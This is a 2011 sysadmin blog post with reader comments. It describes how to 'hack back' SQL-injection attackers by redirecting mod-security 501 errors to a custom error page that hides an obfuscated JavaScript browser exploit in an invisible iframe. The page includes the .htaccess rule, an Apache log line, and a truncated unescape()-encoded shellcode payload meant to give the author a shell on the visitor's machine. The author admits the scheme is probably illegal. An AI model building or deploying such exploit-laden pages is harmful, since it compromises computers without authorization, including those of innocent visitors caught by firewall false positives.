Vengeful Sysadmin Tricks : mod-security, reverse shells and custom error pages lolwut?

Posted: December 9, 2011 in Random pontifications
Tags: ,

Note : Depending on the location this could be considered illegal, do not do this unless you’re sure it’s acceptable under law. I am not responsible for what you do with this information I just thought this would be a fun article to write. No Skiddies were harmed in the making of this travesty.

So I’ve been asked many times, what about offensive security measures for my server or web application. Is it possible to own an attacker back. The answer is quite simply put yes, and we are going to analyze an example of how that would be done. Why? Not sure – I’m feeling pretty awesome today so I decided we’d get a little creative. (I’m out of that slump guys ;-))

The closer I get to you the more I hurt you. –Shinji Ikari

Caveats

This works best (only) if the attacker is using a vulnerable browser to perform inline attacks such as SQL injection. This will do nothing in terms of automated tools.

This is probably illegal to actually do.

This is a pain in the butt to pull off. (But it’s fun!)

Your web application firewall better not EVER spit out false positives, otherwise you may find yourself with a LOT of shells very quickly lol.

Preparing the “Counter” Attack

First step, assuming we have a web application firewall like mod-security that spits out 501 Not Implemented when someone tries to do bad things like SQLi, we need to create a custom error page for 501.

Create .htaccess

In the directory for the website that you want protected by our “offensive” security solution we will create the following .htaccess file.

ErrorDocument 501 /var/www/badbadbad.html

After we restart our Apache server anyone receiving a 501 error will be sent to this file, which we have yet to create. What oh what shall we put in that file… 🙂

Enter the Browser Exploit

The next step in this attack is to create a browser exploit that will compromise the attacker when they reach the 501 page via SQL injection, or some other web nasty.

Targeting the Browser

We can clearly see in our Apache logs that the following individual is attempting to perform SQLi

192.168.0.4 - - [08/Dec/2011:03:56:26 -0500] "GET /index.php?id=-1'%20AND%201=1;-- HTTP/1.1" 501 28098 "dangertux.no-ip.org "Mozilla/3.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20100905 Fedora 15 (Lovelock) Firefox/3.5

Thankfully we have quite a bit of information from their browser header. And we know they are running Firefox 3.5 on Fedora Linux.

On top of it these would be penetrators (I love that word) are in fact using a rather vulnerable browser 😉

So now that we know what browser the attacker is using we can find or create code that will exploit a vulnerability in it and give us code execution.

Creating the Exploit…I Mean…The Error Page

Now our next step is to package the exploit code on the error page we created. Below are the contents of our file badbadbad.html

<HTML>
<HEAD>
<TITLE>SQL Injection is NOT supported here.</TITLE>
</HEAD>
<BODY>
<H1>Error 501</H1>
<H3>The following method is not implemented but thank you for the shell <3</H3>
<b><i>~ Happy Holidays ~ </b></i>
<iframe height=”0” width=”0”>
<script language="JavaScript">var wMAdopNhHKNGsLurezAVSWb=unescape;var aATwpEbpReJ=wMAdopNhHKNGsLurezAVSWb("%u7e98%u993f%u49a8%uf618%uebd1%u9f3c%u249b%u347a%u7177%u7b7f%ub415%u27b6%u8567%u3dfc%u9f97%u787c%uf921%ud387%u3ae2%u32eb%ubed6%u4346%u0c72%u912f
*** SNIP ***  (the rest of the obfuscated exploit code goes here: If you don't know how to do that you shouldn't be doing this)
</script>
</iframe>
</BODY>
</HTML>

Now simply restart your web server and let the good times roll 🙂

The Attack

Once the attacker attempts their attack and it fails they are now presented with the 501 page we created that contains our browser exploit.

What the 'attacker' sees

Once they make it this far we are victorious 🙂

What it feels like to win 😉

There you go – a hack back snack pack for all of those hosting their own blogs 😛

Remember I am 99% sure it’s illegal to actually do this

Advertisements
Comments
  1. Carlos says:

    Haha :), very interesting read Adam. I’m sure going to try this on my own network when I finish with finals. If the attacker spoof his or hers useragent, wouldn’t that render this attack moot?

    -Carlos

  2. Ms. Daisy says:

    It looks indeed like your slump is over. I love your sense of humor! 😀

    • dangertux says:

      Thanks — though you’re far too gracious, if I was actually funny my career change to stand up comic would have been successful. As such I decided to try my hand at system administration. They are the same in a sense, the biggest difference is that one is funny and the other is not, however they are both equally overpaid and their occupation can be argued to be frivolous. I kid…I kid…

      (incoming hatemail from every nix sysop on the face of the planet)

      🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s